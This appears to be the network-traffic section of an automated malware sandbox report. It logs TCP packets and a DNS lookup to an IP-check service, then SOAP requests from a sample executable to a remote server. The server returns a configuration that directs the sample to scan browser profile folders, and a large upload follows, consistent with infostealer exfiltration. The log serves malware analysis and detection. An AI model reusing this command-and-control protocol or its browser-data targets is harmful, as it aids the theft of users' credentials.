Jan 19, 2025 13:02:24.108884096 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.108896971 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.108908892 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.108933926 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.108946085 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.108958960 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.108972073 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.108983994 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.108995914 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109009027 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109020948 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109034061 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109045982 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109070063 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109081984 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109092951 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109105110 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109131098 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109143972 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109154940 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109170914 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109225988 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109237909 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109317064 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109329939 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109353065 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109364986 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109427929 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109441996 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109463930 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109477043 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109498978 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109510899 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109581947 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109596014 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109618902 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109632015 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109658003 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109724045 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109746933 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109761000 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109828949 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109842062 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109893084 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109905958 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109966993 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.109980106 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110025883 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110038042 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110081911 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110096931 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110114098 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110136986 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110193968 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110207081 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110277891 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110290051 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110313892 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110327005 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110341072 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110366106 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110526085 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110538960 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110620975 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110635042 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110718012 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110730886 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110780954 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110794067 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110807896 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110831976 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110874891 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.110898972 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111027002 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111043930 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111068964 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111080885 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111093044 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111104965 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111128092 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111140013 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111161947 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111185074 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111244917 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111258030 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111280918 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111294031 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111325026 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111337900 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111455917 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111468077 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111489058 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111500978 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111543894 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111567020 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111627102 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111639977 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111696005 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111709118 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111723900 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111747980 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111799955 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111813068 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111846924 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111871004 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111931086 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111943007 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111982107 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.111994028 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112015963 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112030029 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112082005 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112095118 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112112999 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112135887 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112158060 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112169981 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112210989 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112236977 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112282991 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112297058 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112318039 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112329960 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112484932 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112498045 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112509966 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112521887 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112545013 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112557888 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112572908 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112586021 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112607956 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112620115 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112673044 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112684965 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112708092 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.112720966 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.113136053 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.113323927 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.113845110 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.114017963 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.114381075 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.114562988 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115092993 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115106106 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115431070 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115443945 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115809917 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115823984 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115834951 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115847111 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115859985 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115871906 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115891933 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115904093 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115937948 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115952015 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115962982 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115974903 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115987062 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.115999937 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116014004 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116027117 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116039991 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116051912 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116064072 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116077900 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116091013 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116101980 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116115093 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116127014 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116138935 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116151094 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116163015 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116174936 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116188049 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116200924 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116213083 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116225004 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116239071 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116261005 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116275072 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116287947 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116300106 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116312981 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116324902 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116338015 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116349936 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116363049 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116374969 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116386890 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116399050 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116410971 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116422892 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116436005 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116447926 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116460085 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116472006 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116483927 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116497040 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116508961 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116513968 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116518974 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116529942 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116544008 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116563082 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116575003 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116586924 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116600037 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116612911 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116626024 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116637945 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116650105 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116662979 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116674900 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116687059 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116699934 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116713047 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116724968 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116736889 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116750002 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116760969 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116774082 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116786003 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116796970 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116808891 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116821051 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116832972 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116844893 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.116869926 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.156306028 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:25.101660013 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:25.116134882 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:25.116924047 CET	49745	55615	192.168.2.4	185.222.57.84

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 19, 2025 13:02:19.816606998 CET	57354	53	192.168.2.4	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 19, 2025 13:02:19.816606998 CET	192.168.2.4	1.1.1.1	0xd50	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 19, 2025 13:02:19.830169916 CET	1.1.1.1	192.168.2.4	0xd50	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 19, 2025 13:02:19.830169916 CET	1.1.1.1	192.168.2.4	0xd50	No error (0)	api.ip.sb.cdn.cloudflare.net		104.26.12.31	A (IP address)	IN (0x0001)	false
Jan 19, 2025 13:02:19.830169916 CET	1.1.1.1	192.168.2.4	0xd50	No error (0)	api.ip.sb.cdn.cloudflare.net		104.26.13.31	A (IP address)	IN (0x0001)	false
Jan 19, 2025 13:02:19.830169916 CET	1.1.1.1	192.168.2.4	0xd50	No error (0)	api.ip.sb.cdn.cloudflare.net		172.67.75.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ip.sb

185.222.57.84:55615

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49741	185.222.57.84	55615	7572	C:\Users\user\Desktop\chTJmCR9bS.exe

Timestamp	Bytes transferred	Direction	Data
Jan 19, 2025 13:02:13.854244947 CET	240	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 185.222.57.84:55615 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jan 19, 2025 13:02:14.438488007 CET	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sun, 19 Jan 2025 12:02:10 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Jan 19, 2025 13:02:19.511054993 CET	223	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 185.222.57.84:55615 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Jan 19, 2025 13:02:19.681185007 CET	25	IN	HTTP/1.1 100 Continue
Jan 19, 2025 13:02:19.777754068 CET	1236	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sun, 19 Jan 2025 12:02:14 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49744	185.222.57.84	55615	7572	C:\Users\user\Desktop\chTJmCR9bS.exe

Timestamp	Bytes transferred	Direction	Data
Jan 19, 2025 13:02:22.104007006 CET	221	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 185.222.57.84:55615 Content-Length: 927735 Expect: 100-continue Accept-Encoding: gzip, deflate
Jan 19, 2025 13:02:23.623109102 CET	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sun, 19 Jan 2025 12:02:19 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49745	185.222.57.84	55615	7572	C:\Users\user\Desktop\chTJmCR9bS.exe

Timestamp	Bytes transferred	Direction	Data
